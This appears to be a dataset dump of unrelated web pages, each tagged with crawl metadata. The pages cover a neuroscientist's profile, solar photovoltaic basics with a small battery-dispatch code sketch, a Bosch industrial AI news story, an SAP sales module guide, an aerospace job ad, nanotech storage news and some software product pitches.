Dimitrios Davalos, PhD Staff Research Scientist Download a Printable PDF Other Professional Titles Associate Director, Gladstone/UCSF Center for In Vivo Imaging Research (CIVIR) More about Dr. Davalos Dr. Dimitrios Davalos studies the neuro-immune mechanisms that influence the brain’s normal function, homeostatic balance, and structural integrity. He is particularly interested in microglia, the resident immune cells of the brain, the spinal cord and the retina, the three major sites of the central nervous system (CNS). His research aims to determine the cellular and molecular mechanisms through which microglia facilitate neuronal plasticity and brain function in physiology and regulate inflammatory processes when the homeostasis or the integrity of the CNS are pathologically compromised. His ultimate goal is to identify new targets for therapeutic intervention. During his graduate years, Dr. Davalos performed the first in vivo imaging study of microglia, taking advantage of advanced microscopy technologies that allowed him to follow the behavior of individual cells inside the intact living brain, in real time. He demonstrated that microglia continuously survey the intact brain, and can contain small localized injuries within only a few minutes. These findings inspired numerous studies aimed at understanding the mechanisms and the significance of such unexpected microglial abilities for neuronal plasticity, function, and dysfunction. In recent years, Dr. Davalos has been studying microglial responses in the context of disruption of the blood-brain-barrier, a pathological phenomenon that is very common among neurological diseases, such as multiple sclerosis, and stroke. He has also developed and published novel methods for imaging the living brain and spinal cord to follow ongoing biological processes over time. His research combines cutting-edge imaging techniques with molecular, cellular and genetic approaches to study the interactions between blood vessels, neurons, and glia, and to understand how their relationships change between health and disease. Dr. Davalos earned a BSc in biology from the University of Athens in Greece, and a PhD in physiology and neuroscience from New York University. He then joined the laboratory of Dr. Katerina Akassoglou for postdoctoral training at the University of California, San Diego (UCSD), and moved with her to the Gladstone Institute of Neurological Disease in 2008. In 2010, Drs. Akassoglou and Davalos established the Center for In Vivo Imaging Research (CIVIR) at the Gladstone Institutes and the University of California, San Francisco. Dr. Davalos currently serves as the associate director of CIVIR, and is a visiting scientist at the National Center for Microscopy and Imaging Research at UCSD. He reviews for several scientific journals and funding institutions and serves as a member of the pilot grant review committee for the National Multiple Sclerosis Society (NMSS). He has organized two Gordon Research Seminars and has received postdoctoral and young investigator awards from the NMSS, the American Heart Association, and the Race to Erase Multiple Sclerosis Foundation.
systems_science
https://sungreenenergy.co.in/about_solar_energy.php
2024-02-24T21:29:47
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474569.64/warc/CC-MAIN-20240224212113-20240225002113-00889.warc.gz
0.922264
2,312
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__84773982
en
Energy from the sun is free, and the sun will continue to shine for billions of years to come. Solar energy is inexhaustible and renewable, and harnessing its irradiance is environmentally friendly: a solar power system does not emit CO2, which is environmentally damaging. In addition, silicon, the raw material for making solar cells, is the second most abundant element in the earth's crust. As the solar industry has developed and the technology has matured, PV power systems have become efficient for both commercial and residential use. The price of PV systems is also more affordable now due to recent price cuts. In contrast, fossil fuels, as our main sources of energy, are depleting. Our high dependence on fossil fuels is inevitably going to push up their prices continuously until they are used up. Fossil fuels are nonrenewable and environmentally damaging. Recent climate change is in part a consequence of the increased CO2 concentration in the atmosphere caused by burning fossil fuels. Therefore, it is essential for us to seek alternative renewable energy resources for guaranteed energy supply and environmental protection. Solar is the answer.
The photovoltaic (PV) effect is the conversion of sunlight energy into electricity. In a PV system, the PV cells exercise this effect. Semi-conducting materials in the PV cell are doped to form a P-N structure with an internal electric field. The p-type (positive) silicon is rich in holes and tends to accept electrons, while the n-type (negative) silicon has surplus electrons that it tends to give up. When sunlight hits the cell, the photons in the light excite some of the electrons in the semiconductors to become electron-hole (negative-positive) pairs. Since there is an internal electric field, these pairs are induced to separate. As a consequence, the electrons move to the negative electrode while the holes move to the positive electrode. A conducting wire connects the negative electrode, the load, and the positive electrode in series to form a circuit. As a result, an electric current is generated to supply the external load. This is how the PV effect works in a solar cell.
Depending on the system's connection to the electricity grid, different components are integrated in a PV system. Generally, all systems include PV modules, wiring, and the associated construction materials. Solar cells are assembled together to form solar modules. Through the PV effect, the solar cells capture sunlight and turn it into direct current (DC) electricity. For an off-grid system, the DC can be used immediately for DC loads if there is no inverter, or the DC can be directed to an inverter, which converts DC into alternating current (AC) that is suitable for conventional electric appliances. For the off-grid system, excess energy generated by the PV panels is usually stored in batteries, controlled by the charge controller, for use at night when there is no sunlight. An optional backup power source such as a diesel generator can be installed in case the electricity from the batteries runs out. For a grid-tied system, DC is converted into AC to be used on-site or stored for backup if the system includes battery banks. When there is more demand, power can be drawn from the grid. Excess electricity from the PV panels can also be fed back into the grid. This process of drawing and feeding electricity to the grid is monitored by the solar production meter and the export/import meter.
Solar modules can be arranged into arrays that are large enough to function as power stations converting sunlight into electrical energy for industrial, commercial, and residential use. Solar modules in smaller configurations can be installed on buildings for residential or commercial use. Solar panels can also be used in remote areas where there is a short supply of electricity or where electricity cannot be delivered, such as in space.
Depending on the technology used to produce the PV cell, a different manufacturing process takes place. As mentioned earlier, semi-conducting materials are the fundamental elements making up a solar cell. By different choices of semiconductors, crystalline silicon in wafer form, thin films of other materials, and concentrated PV (CPV) are the technologies used.
1. Crystalline silicon (c-Si). This is the mainstream technology, with an 85-90% market share. There are generally two types of this semiconductor: mono-crystalline silicon and polycrystalline silicon. Polycrystalline silicon is composed of a number of smaller silicon crystals. The multiple crystals create boundaries for electrons, resulting in lower efficiency compared to mono-crystalline silicon. However, polycrystalline silicon can be produced at a lower cost than mono-crystalline, and it is the most widely used in the solar industry.
Sand is mostly made up of silica. In the first step, silica goes through a carbothermic reduction process and becomes metallurgical grade silicon (MG-Si). The MG-Si then goes through refining and casting processes to become poly-silicon. The poly-silicon material goes into two different production processes, one for mono-crystalline silicon and one for multi-crystalline silicon. For mono-crystalline silicon, the poly-silicon is used for ingot growing, either through the Czochralski (CZ) or the Float Zone (FZ) process. For multi-crystalline silicon, the poly-silicon material is melted and then cast into bricks. The mono-crystalline silicon ingot is then sliced into wafers. As for the poly-crystalline silicon, the silicon brick is first diced into bars and then sliced into wafers. Since mono-crystalline silicon grows in a cylindrical shape, its wafers are not perfect squares.
For both mono- and multi-crystalline silicon, a semiconductor junction is formed by diffusing an n-type or p-type dopant onto the top surface of the silicon wafer to form the p-n junction of a solar cell. Depending on the process, it might start out with an n-type wafer, followed by a p-type layer. Solar cells are wired together to form a circuit. Contacts are applied to the front and rear of the cell to protect the cells and increase efficiency in absorbing light. With the necessary functions to generate electricity, the solar cells are assembled to form solar modules. The modules are the final solar products that can be arranged in arrays for larger output.
In addition, there is a new technology producing quasi-mono semiconductors. They have similar appearance and electrical properties to mono-crystalline silicon. The quasi-mono material is produced from poly-crystalline ingots, but a mono-crystal seed is used partially in the crystal growth process.
A conducting layer is then formed on the front electrical contact of the cell, and a metal layer is formed on the rear contact. The different types of materials used in thin films are amorphous silicon (a-Si), CIGS/CIS, and CdTe.
Amorphous silicon (a-Si): the most common and most developed. It is the non-crystalline form of silicon. The cell structure has a single sequence of p-i-n layers. When exposed to the sun, its power output decreases significantly. a-Si thin film solar cells are commonly found in calculators. An a-Si thin film is manufactured in six steps. First, the glass substrate is coated with a TCO (transparent conductive oxide) layer as the front contact, followed by P1 laser scribing. Then a layer of a-Si is deposited, followed by P2 laser scribing. Then a metal conductive layer is placed as the back contact, with the corresponding P3 laser scribing.
CIGS/CIS: this is the semiconductor material composed of copper, indium, selenium, and/or gallium. In thin film technology, CIGS has the highest PV conversion efficiency. CIGS/CIS has a similar manufacturing process to a-Si thin films. However, as opposed to a-Si thin film, the glass substrate in CIGS/CIS is at the rear instead of the front. In addition, CdS is applied as a buffer layer.
CdTe: this is formed from cadmium and tellurium. It is usually combined with cadmium sulfide to form a p-n junction PV cell. The composition is similar to an a-Si solar cell, with an additional CdS buffer layer. First Solar is the largest manufacturer.
Concentrated PV (CPV): the technology is to build the solar cells into concentrating collectors that use a lens to focus the sunlight onto the cells. As a result, less semi-conducting material is used for the solar cells, decreasing material costs while collecting as much sunlight as possible. Efficiencies are in the range of 20 to 30%.
There are generally two types of PV systems, off-grid and grid-tied, depending on their connection to the utility grid.
Off-grid DC system (without inverter): The DC output is immediately directed to DC loads. Excess power is stored in the battery banks, controlled by the charge controller. Common applications of this system are found in RVs, boats, cabins, farm appliances, or rural telecommunication services. A backup generator may be included.
Off-grid AC system (with inverter): An inverter is added to this system. The generated energy is directed to the inverter, which converts DC to AC electricity for conventional electric appliances. Excess energy is stored in batteries, and an optional backup generator can be added.
Hybrid system: In this system, another renewable energy generator is added to generate more power. For example, a wind turbine can be added to generate electricity from wind. This system is useful in places where the weather is sunny and windless during summer but cloudy and windy during winter. This system is typically off-grid and the excess energy is stored in batteries. If neither the PV panel nor the wind turbine generates enough electricity, backup power such as a diesel generator can be added to generate more energy.
Grid-tied system (without battery backup): In this system, the generated DC is converted to AC and used on-site. The solar power production is monitored by the solar production meter. If there is excess energy, it can be fed into the electricity grid. If the PV system does not generate enough power because of higher demand, the needed energy can be drawn from the grid. This process of drawing or feeding electricity to the grid is monitored by the export/import meter.
Grid-tied system with battery backup: in this system, the generated energy is used on-site or stored in batteries. The charge controller monitors battery capacity, and excess energy is stored in the batteries for backup. If the batteries reach full capacity, the remaining excess can be fed into the electricity grid. Conversely, if the PV system does not generate enough power, the needed energy can be drawn from the grid. This exchange is handled automatically through a net metering program.
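To make the dispatch order of a grid-tied system with battery backup concrete, here is a minimal Python sketch of the priority described above: loads first, then battery charging, then grid export, with grid import covering any shortfall. It is only an illustration; the capacity and efficiency figures are hypothetical and not taken from any specific product.

```python
def dispatch(pv_kwh, load_kwh, battery_kwh, battery_capacity_kwh=10.0,
             charge_efficiency=0.95):
    """Allocate one interval of PV energy: loads -> battery -> grid export.

    Returns the new battery state plus energy exported to / imported from
    the grid. All values are kWh per interval; figures are illustrative only.
    """
    surplus = pv_kwh - load_kwh
    exported = imported = 0.0

    if surplus >= 0:
        # Charge the battery first, then export whatever it cannot absorb.
        headroom = battery_capacity_kwh - battery_kwh
        charged = min(surplus * charge_efficiency, headroom)
        battery_kwh += charged
        exported = surplus - charged / charge_efficiency
    else:
        # Cover the shortfall from the battery, then import the rest.
        deficit = -surplus
        discharged = min(deficit, battery_kwh)
        battery_kwh -= discharged
        imported = deficit - discharged

    return battery_kwh, exported, imported

# Example interval: 4 kWh of PV production against a 2.5 kWh load.
print(dispatch(pv_kwh=4.0, load_kwh=2.5, battery_kwh=6.0))
```

In a real installation it is the export/import meter, not logic like this, that records the flows for net-metering billing; the sketch only mirrors the decision order the text describes.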
systems_science
https://connect.springerpub.com/search?query=&f%5B0%5D=content_type%3ABooks&f%5B1%5D=content_type%3APatient+Education&f%5B2%5D=keyword%3Afeeling-state&f%5B3%5D=keyword%3Ahealth+care&implicit-login=true&sigma-token=ES6vptCXky7mJvv16MAAYi70h4qvMFxGUkfwImlN36c&sort_by=date_ppub_facet&page=0&items_per_page=50
2023-03-31T18:57:33
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949678.39/warc/CC-MAIN-20230331175950-20230331205950-00050.warc.gz
0.932436
273
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__48934741
en
This comprehensive textbook contains information on a wide array of topics, including the organization of care, population health, the fundamental challenges of health disparities, health care financing and economics, and health information technology’s role in improving care and protecting privacy. New chapters on public health preparedness and its role in mitigating effects on health and the health system and the medical and social challenges of caring for older adults provide insight into important, ongoing challenges and what those challenges reflect about our system of care. With an increased emphasis on health disparities, population health, and health equity, this textbook includes a timely focus on how social and behavioral determinants influence health outcomes. Students will gain a deeper understanding of public health systems and their societal role and of the economic perspectives that drive health care managers and the system. Thorough coverage of the rapid changes that are reshaping our system, in addition to an evaluation of our nation’s achievement of health care value, will equip students with the critical knowledge they need to enter this dynamic and complex field. The book also includes cutting-edge, evidence-based information on preventive medicine, innovative approaches to control health care costs, initiatives to achieve high-quality and value-based care, and much more from prominent scholars, practitioners, and educators within health care management, public health, population health, health policy, medical care, and nursing.
systems_science
https://enterpriseiotinsights.com/20200116/channels/news/bosch-positions-ai-at-heart-of-factories-and-products
2022-07-03T18:25:56
s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104248623.69/warc/CC-MAIN-20220703164826-20220703194826-00526.warc.gz
0.958788
1,264
CC-MAIN-2022-27
webtext-fineweb__CC-MAIN-2022-27__0__56434995
en
Bosch positions AI next to 5G at heart of industrial change strategy Bosch wants to be an “innovation leader” in AI, it told CES last week. The German industrial giant, one of the manufacturing sector’s most outspoken champions of industrial 5G, is seeking to mainline data in its products and factories, and apply advanced analytics to drive efficiencies in its business and environmental impact. By 2025, every product out of its 270 factories will either contain artificial intelligence or else have been developed or manufactured with the help of it, it declared. The message on industrial AI comes as the company prepares, again, to be among the more notable industrial outfits on the traditional tech circuit in 2020, taking in MWC in late February and Hannover Messe in late April. Bosch set the tone for digital industry in 2019 with its visions about fold-away digital factories and modular assembly, threaded with wireless 5G. It closed 2019 by confirming its application for private 5G licences in Germany had gone to the regulator. It has kicked off 2020 with a clear statement of intent around the complementary role of AI in the industrial space. Bosch has established a new AI training programme, with the intention of making 20,000-odd managers, engineers and developers “AI-savvy” over the next two years. “We must invest not only in artificial intelligence, but in human intelligence as well,” said Michael Bolle, board member at Bosch. Bosch invests €3.7 billion per year in software development, it said. It currently employs around 30,000 software engineers, with 1,000 of them ‘working on AI. The new programme includes guidelines for using AI responsibly. The company has drawn up its own set of “principles” for AI security and sovereignty, with a view to build trust with customers. “Trust is the [measure of] product quality of the digital world,” said Bolle. The company said its interest in AI is to improve technology, only, and not to map human behaviour. People should always remain in control, it said, whether at home or in the factory. “Industrial AI has to be safe, robust, and explainable,” said Bolle. Bosch has said it will invest €100 million in an AI research campus in Tübingen, in Germany, scheduled to open at the end of 2022 with 700 staff, including from external startups and research institutes, as well as from Bosch itself. The new facility will slot into the Cyber Valley setup in Baden-Württemberg, in Germany. Cyber Valley was established in 2016 by ZF Friedrichshafen, Daimler, Porsche, BMW, and Facebook, alongside Bosch, as a joint research venture to bring together partners from industry, academia, and government to drive forward AI research. The AI campus will work with seven other ‘Bosch centres for AI’ (BCAI), which includes two facilities in the US, where research and development of commercial AI techniques has been strongest. The US sites are in Sunnyvale and Pittsburgh. The BCAI venues employ around 250 data scientists in total; they focus on AI in mobility, manufacturing, and agriculture. At CES earlier this month, Bosch showcased a number of AI-inspired products, notably for cars. It introduced new in-car video analytics systems. It has developed a digital sun visor (Virtual Visor; see image) with a transparent LCD display connected to an interior monitoring camera in the vehicle. The camera detects the position of the driver’s eyes, and AI darkens the windshield in response, at the point where the sun dazzles the driver. The LCD also shows 3D driving alerts. 
And the camera is fixed to detect when the driver is drowsy or looks away from the road, based on their head position, and movement of their gaze and eyelids. The system responds, apparently by assuming temporary charge of the visual inputs and alerting the driver in case of danger. Bosch generated €2 billion of sales in 2019 from driver safety systems. AI will make them even safer, it said, bringing intelligence and responsiveness to assisted braking systems (ABS), electronic stability programmes (ESP), and airbag control units. “In the future, when vehicles are in partially automated driving mode for sections of the journey such as on the freeway, the driver monitoring system will become an indispensable partner: In these situations, the camera will ensure that the driver can safely take the wheel again at any time,” the company said. Bosch is looking to produce lidar sensors for car safety systems, to complement existing radar and camera based systems. “Lidar is the third essential sensor technology,” it said. Its new long-range lidar sensor can detect non-metallic objects at a great distance, such as rocks on the road, it reckons. Meanwhile, Bosch has also deployed AI with its lunchbox-sized SoundSee sensor system, bound for space with NASA’s autonomous flying Astrobee robot, which launched at the end of 2019. The sensor is being used to analyse audio data, routed via ground control, to isolate unusual sounds, and indicate when maintenance is necessary. It said, as well, that AI will play a key role in energy management platforms at its 400 sites across the globe – including all its 270 manufacturing plants – as they switch between energy sources, and the company looks to be carbon neutral by the end of this year (2020). “We’ve already achieved this for our German locations,” said Bolle. Bosch has raised more than €1.5 billion in revenue from the implementation of Industry 4.0 techniques in its own factories, as well as its customers’ factories, during the past four years, it reckons. The company has set an incremental revenue target of €1 billion per annum by 2022 from applying digital-change solutions inside and outside of its own factories.
systems_science
http://nanodesigner.sourceforge.net/
2017-04-24T03:20:17
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917118963.4/warc/CC-MAIN-20170423031158-00537-ip-10-145-167-34.ec2.internal.warc.gz
0.940665
261
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__143401497
en
What is Nanodesigner? The Nanodesigner project is an attempt to create a software platform for research on nanometer-sized objects. By objects is meant everything that consists of atoms: molecular motors, biomolecules, a crystal slab... Research encompasses the construction of objects out of atoms within the constraints of the laws of quantum mechanics (not unlike the use of a CAD software package in the design of a building, for example) and the simulation of their dynamic behaviour in an attempt to find the properties of the object. In the field of bio-informatics a lot of software already exists, and there is strong competition among molecular visualisation and simulation tools. There are, however, only a few software packages that are more general in design and allow the user to build arbitrary objects consisting of atoms from scratch, as is necessary in the field of molecular nanotechnology. Visualizing those objects is an important aspect of design, but the simulation of their dynamic behaviour to find the physico-chemical properties of the object is paramount. Nanodesigner is going to be one of those, a general multi-purpose tool: it will have a highly modular design from the start, and the user will be able to extend it in any way he or she wants by writing or using plug-ins.
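The kind of simulation described here — taking an object built from atoms and computing its physico-chemical properties — ultimately rests on evaluating interatomic interactions. The sketch below is a generic classical example (a Lennard-Jones pair potential), not Nanodesigner code or its API; the parameters are illustrative, roughly argon-like values.

```python
import math

# Illustrative Lennard-Jones parameters (roughly argon-like); not from Nanodesigner.
EPSILON = 0.0104  # well depth, eV
SIGMA = 3.40      # zero-crossing distance, angstrom

def lj_energy(atoms):
    """Total pairwise Lennard-Jones energy of a list of (x, y, z) positions."""
    total = 0.0
    for i in range(len(atoms)):
        for j in range(i + 1, len(atoms)):
            r = math.dist(atoms[i], atoms[j])
            sr6 = (SIGMA / r) ** 6
            total += 4.0 * EPSILON * (sr6 * sr6 - sr6)
    return total

# Three atoms spaced near the potential minimum (~1.12 * sigma apart).
print(lj_energy([(0.0, 0.0, 0.0), (3.82, 0.0, 0.0), (7.64, 0.0, 0.0)]))
```

A real nanotechnology design tool would layer much more on top of this (quantum-mechanical methods, constraint checking, visualization), but energy evaluation of candidate structures is the common core.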
systems_science
https://postboulder.com/a-comprehensive-guide-to-sap-sales-and-distribution-modules/
2024-04-17T05:35:47
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817144.49/warc/CC-MAIN-20240417044411-20240417074411-00246.warc.gz
0.902312
933
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__60382606
en
In the ever-evolving world of business and technology, staying ahead of the competition is imperative. Companies worldwide are continually seeking ways to streamline their operations, enhance customer satisfaction, and improve overall efficiency. One such solution that has revolutionized the way businesses manage their sales and distribution processes is SAP Sales and Distribution (SD) modules. In this comprehensive guide, we will delve into the intricacies of SAP SD, its functionalities, benefits, and how it can be a game-changer for your organization. Understanding SAP Sales and Distribution Modules SAP SD, short for Sales and Distribution, is an integral part of the SAP Enterprise Resource Planning (ERP) system. It is designed to facilitate and optimize various business processes, primarily those related to sales, order management, and distribution. This module covers a wide range of functions, including: 1. Sales Order Management One of the core functions of SAP SD is managing sales orders efficiently. From creating sales orders to order processing and delivery, this module ensures that the entire process is seamless and error-free. Sales teams can easily input orders, check product availability, and provide customers with accurate delivery dates. 2. Pricing and Billing Accurate pricing and billing are crucial aspects of any business. SAP SD provides robust tools for pricing determination, allowing organizations to set up complex pricing structures based on various criteria such as customer groups, geographical locations, or product categories. This ensures that customers are billed correctly, reducing disputes and enhancing customer satisfaction. 3. Inventory Management Efficient inventory management is essential for meeting customer demand while minimizing carrying costs. SAP SD enables real-time tracking of inventory levels, helping businesses optimize stock levels, reduce holding costs, and avoid stockouts. 4. Shipping and Transportation SAP SD streamlines the shipping and transportation processes by integrating with logistics and warehouse management systems. This integration ensures that the right products are shipped to the right customers in the most cost-effective and timely manner. 5. Customer Relationship Management (CRM) Maintaining strong customer relationships is vital for long-term success. SAP SD provides tools for managing customer data, tracking interactions, and analyzing customer behavior. This information is invaluable for creating personalized marketing campaigns and improving customer service. Benefits of Implementing SAP SD Now that we have a clear understanding of the various functions of SAP SD, let’s explore the benefits it offers to organizations: 1. Improved Efficiency SAP SD automates and streamlines many manual processes, reducing the risk of errors and increasing overall efficiency. This translates into faster order processing, quicker deliveries, and happier customers. 2. Enhanced Customer Satisfaction With real-time access to order status and accurate delivery estimates, customers experience a higher level of satisfaction. They can trust that their orders will be fulfilled promptly and accurately. 3. Cost Reduction Efficient inventory management and optimized pricing strategies can significantly reduce operating costs. By minimizing excess inventory and avoiding costly stockouts, organizations can achieve substantial savings. 4. 
Data-Driven Decision Making SAP SD provides access to a wealth of data related to sales, customer behavior, and market trends. This data empowers businesses to make informed decisions, adapt to changing market conditions, and identify growth opportunities. 5. Scalability As businesses grow, their requirements change. SAP SD is highly scalable, allowing organizations to expand their operations seamlessly without major disruptions to their existing processes. Implementing SAP SD in Your Organization While the benefits of SAP SD are evident, implementing this module requires careful planning and execution. Here are some key steps to consider: 1. Needs Assessment Begin by conducting a thorough assessment of your organization's specific needs and goals. Identify areas where SAP SD can provide the most significant impact. 2. Vendor Selection Choose a reputable SAP implementation partner or vendor with a proven track record. Their expertise will be invaluable in ensuring a successful implementation. 3. Training Invest in comprehensive training for your staff to maximize the benefits of SAP SD. Well-trained employees will be more efficient in using the system and adapting to new processes. 4. Continuous Improvement SAP SD is not a one-time solution; it requires ongoing maintenance and optimization. Regularly review your processes and adapt them to changing business needs. In conclusion, SAP Sales and Distribution modules offer a comprehensive solution for businesses looking to optimize their sales, order management, and distribution processes. By embracing SAP SD, organizations can improve efficiency, enhance customer satisfaction, and gain a competitive edge in today's dynamic business landscape.
systems_science
https://jobs4-aerojet-rocketdyne.icims.com/jobs/14376/associate-engineer%2C-systems-operability-%26-analysis/job
2019-01-20T17:19:00
s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583728901.52/warc/CC-MAIN-20190120163942-20190120185942-00373.warc.gz
0.927871
675
CC-MAIN-2019-04
webtext-fineweb__CC-MAIN-2019-04__0__68211678
en
Aerojet Rocketdyne is the preferred provider of high-value propulsion, power, energy, and innovative system solutions. Our products and services have been used in a wide variety of government and commercial applications, including the main engines for the NASA SLS, Atlas and Delta launch vehicles, and missile defense systems including flight research vehicles. Join our team as an Associate Engineer, Systems Operability & Analysis. This entry-level position will be located at our West Palm Beach, FL office. This site operates on a 9/80 work schedule. In this position, the engineer will work with senior engineers within Systems Analysis Engineering to conduct cycle and engine matching analyses to analyze engine data to develop an understanding of component level performance and its relationship to overall engine performance. The engineer will perform these analyses for both steady-state and transient engine operating modes. The engineer will use test data to validate and update system simulations as required to enable accurate predictions of engine operating states. The engineer will work in a team environment to develop digital engine control logic and schedules to support Program development activities. This individual will mentor under the senior engineers to develop the necessary design skills required to analyze and create system designs and will utilize analysis configuration control principles to document results and conclusions. 40% - The systems analyst primarily will perform advanced concept thermodynamic design of liquid rocket engines and/or air-breathing engines to define propulsion cycles that meet functional vehicle requirements. During the development activities of these propulsion systems the systems analyst will primarily conduct performance analyses and evaluate the steady state and transient operation of these propulsion systems. Duties may include evaluation of ground test and flight data to determine engine health and conformance to performance requirements. 40% - Duties will include creating, maintaining and using math models of propulsion systems which characterize the thermodynamic, aerodynamic, fluid dynamic and mechanical operation of these systems. 10% - Propulsion development activities include contributing technical analyses to anomaly investigation and resolution teams. 10% - As required, provide on-site customer technical support for vehicle preparation, launch and post-flight activities. Requires a Bachelor's degree in Mechanical or Aerospace Engineering, or an equivalent combination of education and experience. High academic achievement is preferred (GPA 3.2 or higher). US Citizenship required. Must also be able to obtain and maintain a U.S. Security Clearance at the appropriate level. Must be able to satisfy federal government requirements for access to government information, and having dual citizenship may preclude you from being able to meet this requirement. Work Environment/Physical Requirements: Employees in these positions must possess mobility to work in a standard office setting and to use standard office equipment, including a computer; stamina to sit and to maintain attention to detail despite interruptions; may occasionally lift/carry/push/pull up to 25 pounds; may require minimal walking, climbing, stooping, crouching, and/or bending; and vision to read printed materials and a computer screen, and hearing and speech to communicate in person and over the telephone. May require the ability to travel by air or auto. 
May require the use of personal protective equipment such as safety glasses, safety shoes, and shop coat. These positions may be expected to work varying shifts and hours to ensure successful operation of activities in the organization. Must be able to travel by air, car or train.
systems_science
http://www.nag.co.za/forums/showthread.php?4899-The-500-000-GB-MP3-Player
2013-06-20T11:06:57
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368711441609/warc/CC-MAIN-20130516133721-00099-ip-10-60-113-184.ec2.internal.warc.gz
0.941059
296
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__166194056
en
Can you even imagine an MP3 player with a 500,000 GB capacity? It?s pretty much beyond belief. The most generous player today can only hold around 40,000 songs ? they?d hardly make a dent on this. The thing is, it could easily happen. Scientists at the University of Glasgow have created a nanotechnology breakthrough that could increase storage capacity by 150,000 times. It could mean 500,000 GB on a single chip and inch square. The Glasgow scientists worked to create the molecule-sized switch that?s at the heart of it all. Professor Lee Cronin at the University of Glasgow said, ?What we have done is find a way to potentially increase the data storage capabilities in a radical way. We have been able to assemble a functional nanocluster that incorporates two electron donating groups, and position them precisely 0.32 nm apart so that they can form a totally new type of molecular switching device. The key advantage of the molecule sized switch is information / transistor density in traditional semi-conductors. Molecule sized switches would lead to increasing data storage to say 4 Petabits per square inch. This breakthrough shows conceptually that this is possible (showing the bulk effect) but we are yet to solve the fabrication and addressing problems. The fact these switches work on carbon means that they could be embedded in plastic chips so silicon is not needed and the system becomes much more flexible both physically and technologically.?
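As a quick sanity check on the figures quoted in the article (4 petabits per square inch versus 500,000 GB on a chip about an inch square), the conversion is simple decimal arithmetic. This is only a consistency check of the article's own numbers, not new data:

```python
petabits_per_sq_inch = 4            # density quoted by Cronin
bits = petabits_per_sq_inch * 10**15
gigabytes = bits / 8 / 10**9        # 8 bits per byte, decimal gigabytes
print(gigabytes)                    # 500000.0 GB on one square inch
```

At a rough 4 MB per song, that capacity would hold on the order of a hundred million songs, which is why the 40,000-song players of the time would "hardly make a dent" in it.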
systems_science
http://www.mmjgrobase.com/compliance/
2014-03-09T15:04:37
s3://commoncrawl/crawl-data/CC-MAIN-2014-10/segments/1393999679238/warc/CC-MAIN-20140305060759-00083-ip-10-183-142-35.ec2.internal.warc.gz
0.914787
272
CC-MAIN-2014-10
webtext-fineweb__CC-MAIN-2014-10__0__152170271
en
Is GRObase compliant? GRObase is a robust web based software solution that is specifically designed to handle the day-to-day workflow of Licensed Producers, while ensuring compliance under Health Canada’s Marihuana for Medical Purposes Regulations (MMPR). With failsafe protocols implemented into the core design, it ensures data is always properly recorded and stored within the system allowing Health Canada audits to be fulfilled with ease. The database system has a number of customizable features, ensuring that Licensed Producers get the most out of their GRObase. - Database allows for inclusive record keeping while fulfilling your core MMPR requirements. - Fail-safe protocols implemented to ensure that all information is recorded in an accurate manner. - Employee audit tracking when entering or changing data to properly identify who performed each task. - Digitally stored documents on the database for easy access and to assist with Health Canada audits. - Traceback tactics of each product’s origin are instilled to ensure that proper record keeping is performed. - In vitro testing logs to ensure that quality assurance testing is carried out and recorded successfully. "It's your record keeping backbone." Pre-register for GRObase GRObase is scheduled for release Spring 2014. Pre-register now if you would like to receive development updates and
systems_science
http://www.m4u.com.au/CRM-integrated-sol.html
2013-05-25T12:19:10
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368705948348/warc/CC-MAIN-20130516120548-00030-ip-10-60-113-184.ec2.internal.warc.gz
0.860816
188
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__36990036
en
Click here to see our new API page INTEGRATED SMS SOLUTIONS With Message4U's advanced SMS gateway technology and SMS API, the convenience and effectiveness of SMS software can be built in to your organisation's existing CRM systems. Empowering a CRM system with wireless communication technology can enable it to send PC-to-SMS messages to customers, and to receive replies directly to your application's interface. For example, integrating SMS solutions with appointment booking software can enable an application to send scheduled reminder notices to customers. Alternatively, SMS can be integrated into an inventory system so that customers can be immediately notified when an ordered item becomes available. Sales and account management staff can also benefit from integrated SMS solutions with point of sale systems and CRM applications. For more information about our integrated SMS services, phone 1800 009 767 or contact Message4U for detailed information in PDF format.
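As a rough illustration of what integrating SMS into an appointment booking system looks like in practice, the sketch below posts a reminder message to a generic HTTP SMS gateway. The endpoint, field names, and credentials here are hypothetical placeholders, not Message4U's actual API:

```python
import urllib.parse
import urllib.request

GATEWAY_URL = "https://example-sms-gateway.invalid/api/send"  # placeholder endpoint

def send_appointment_reminder(api_key: str, phone: str, when: str) -> bytes:
    """Send a single reminder SMS through a hypothetical HTTP gateway."""
    payload = urllib.parse.urlencode({
        "key": api_key,
        "to": phone,
        "message": f"Reminder: your appointment is scheduled for {when}.",
    }).encode()
    request = urllib.request.Request(GATEWAY_URL, data=payload, method="POST")
    with urllib.request.urlopen(request) as response:
        return response.read()  # gateway's delivery receipt / message id
```

A booking application would typically call something like this from a scheduled job the day before each appointment, and replies routed back by the gateway would be matched to the customer record by phone number.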
systems_science
https://articles.saleae.com/oscilloscopes/digital-oscilloscopes
2023-11-29T18:47:16
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100135.11/warc/CC-MAIN-20231129173017-20231129203017-00212.warc.gz
0.903916
1,361
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__4636232
en
